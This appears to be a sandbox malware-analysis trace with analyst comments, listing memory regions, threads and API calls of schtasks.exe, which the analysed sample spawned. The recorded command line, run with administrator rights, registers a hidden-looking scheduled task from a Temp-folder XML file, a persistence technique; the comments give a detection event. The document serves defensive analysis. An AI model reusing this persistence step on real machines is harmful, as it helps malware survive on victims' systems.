filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2156
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2157
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2158
start_va = 0x6ec30000
end_va = 0x6f3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 2162
start_va = 0x6e960000
end_va = 0x6ea8ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll")
Region:
id = 2163
start_va = 0x6ae10000
end_va = 0x6af3bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.directoryservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\system.directoryservices.ni.dll")
Region:
id = 2164
start_va = 0x74a10000
end_va = 0x74a12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 2165
start_va = 0x74980000
end_va = 0x74a08fff
monitored = 1
entry_point = 0x74981130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 2166
start_va = 0x400000
end_va = 0x40ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2167
start_va = 0x410000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2172
start_va = 0x6f750000
end_va = 0x6f7a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.security.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\microsoft.powershell.security.ni.dll")
Thread:
id = 10
os_tid = 0xfcc
Thread:
id = 14
os_tid = 0x818
Thread:
id = 15
os_tid = 0x814
Thread:
id = 16
os_tid = 0x324
Thread:
id = 22
os_tid = 0x758
Thread:
id = 23
os_tid = 0x75c
Thread:
id = 24
os_tid = 0x48c
Thread:
id = 25
os_tid = 0x6f8
Thread:
id = 26
os_tid = 0x428
Thread:
id = 27
os_tid = 0x7cc
Thread:
id = 28
os_tid = 0x85c
Thread:
id = 35
os_tid = 0x7b8
Thread:
id = 37
os_tid = 0xd10
Thread:
id = 38
os_tid = 0x950
# Child process of the analysis target: parent_id = "1" and os_parent_pid = "0xf60"
# match the id and os_pid of the Process record marked "analysis_target".
# cmd_line shows schtasks.exe /Create registering a scheduled task from an XML
# definition stored in the user's Temp directory. The task's action and trigger
# live in that XML file, not in this record; review the file from the analysis
# artifacts before concluding what the task runs.
# In "Updates\\nFxIoujoILCO" the "\\n" is an escaped backslash followed by "n"
# (task folder "Updates", task name "nFxIoujoILCO"), not a newline escape.
# os_integrity_level 0x3000 is the high mandatory level and os_groups lists
# BUILTIN\Administrators, so the task is registered from an elevated context.
# cmd_line names System32 while filename records syswow64 (bitness = "32");
# presumably WOW64 file-system redirection - confirm against the analyzer docs.
# Detection note: task registration is logged as Security event 4698 when the
# relevant object-access audit policy is enabled.
Process:
id = "3"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3d361000"
os_pid = "0xfdc"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1489
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1490
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1491
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1492
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1493
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1494
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1495
start_va = 0x140000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1496
start_va = 0x770000
end_va = 0x79dfff
monitored = 1
entry_point = 0x787683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1497
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1498
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1499
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1500
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1501
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1502
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1503
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1504
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1505
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1506
start_va = 0x180000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1507
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1508
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1509
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1510
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1511
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1512
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1513
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1514
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1515
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1516
start_va = 0x240000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 1517
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1518
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1519
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1520
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1521
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1533
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1534
start_va = 0x380000
end_va = 0x3e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1535
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1536
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1537
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1538
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1539
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1540
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1541
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1542
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1543
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1544
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1545
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1546
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1547
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1548
start_va = 0x74920000
end_va = 0x74928fff
monitored = 0
entry_point = 0x74921830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 1549
start_va = 0x3f0000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1550
start_va = 0x480000
end_va = 0x607fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1551
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1552
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1553
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1554
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1555
start_va = 0x7a0000
end_va = 0x920fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 1556
start_va = 0x930000
end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1557
start_va = 0x70000
end_va = 0x81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 1565
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1566
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1567
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1568
start_va = 0x1d30000
end_va = 0x1ffefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1573
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1574
start_va = 0xe0000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1577
start_va = 0x610000
end_va = 0x6eefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 1580
start_va = 0x6f0000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1581
start_va = 0x2150000
end_va = 0x218ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 1582
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1583
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1584
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1585
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1586
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1587
start_va = 0x6ad20000
end_va = 0x6ad9cfff
monitored = 0
entry_point = 0x6ad2166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 11
os_tid = 0xfe0
[0153.978] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb38 | out: lpSystemTimeAsFileTime=0xdfb38*(dwLowDateTime=0xd687b460, dwHighDateTime=0x1d8a8be))
[0153.978] GetCurrentProcessId () returned 0xfdc
[0153.978] GetCurrentThreadId () returned 0xfe0
[0153.978] GetTickCount () returned 0x166c93e
[0153.978] RtlQueryPerformanceCounter () returned 0x1
[0153.978] GetModuleHandleA (lpModuleName=0x0) returned 0x770000
[0153.978] __set_app_type (_Type=0x1)
[0153.979] __p__fmode () returned 0x754b31f4
[0153.979] __p__commode () returned 0x754b31fc
[0153.979] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x787881) returned 0x0
[0153.980] __wgetmainargs (in: _Argc=0x799e6c, _Argv=0x799e74, _Env=0x799e70, _DoWildCard=0, _StartInfo=0x799e80 | out: _Argc=0x799e6c, _Argv=0x799e74, _Env=0x799e70) returned 0
[0153.981] _onexit (_Func=0x790fe2) returned 0x790fe2
[0153.981] _onexit (_Func=0x790ff3) returned 0x790ff3
[0153.981] _onexit (_Func=0x791002) returned 0x791002
[0153.981] _onexit (_Func=0x79101e) returned 0x79101e
[0153.981] _onexit (_Func=0x79103a) returned 0x79103a
[0153.982] _onexit (_Func=0x791056) returned 0x791056
[0153.982] _onexit (_Func=0x791072) returned 0x791072
[0153.982] _onexit (_Func=0x79108e) returned 0x79108e
[0153.982] _onexit (_Func=0x7910aa) returned 0x7910aa
[0153.982] _onexit (_Func=0x7910c6) returned 0x7910c6
[0153.982] _onexit (_Func=0x7910e2) returned 0x7910e2
[0153.982] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0153.983] WinSqmIsOptedIn () returned 0x0
[0153.983] GetProcessHeap () returned 0x280000
[0153.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x28f0a0
[0153.983] SetLastError (dwErrCode=0x0)
[0153.983] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0153.983] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0153.983] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0153.983] VerifyVersionInfoW (in: lpVersionInformation=0xdf5b0, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdf5b0) returned 1
[0153.983] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294bf0
[0153.984] lstrlenW (lpString="") returned 0
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x2) returned 0x294fd8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x294fe8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c08
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295008
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295028
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295048
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295068
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c20
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295088
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950a8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950c8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950e8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c38
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295108
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295128
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295160
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295180
[0153.985] SetThreadUILanguage (LangId=0x0) returned 0x409
[0153.985] SetLastError (dwErrCode=0x0)
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951a0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951c0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951e0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295200
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295220
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c50
[0153.986] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x208) returned 0x295ac8
[0153.986] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x295ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0153.987] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0153.989] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0153.989] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0153.989] GetProcessHeap () returned 0x280000
[0153.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x74e) returned 0x295cd8
[0153.990] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0153.990] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x295cd8 | out: lpData=0x295cd8) returned 1
[0153.990] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
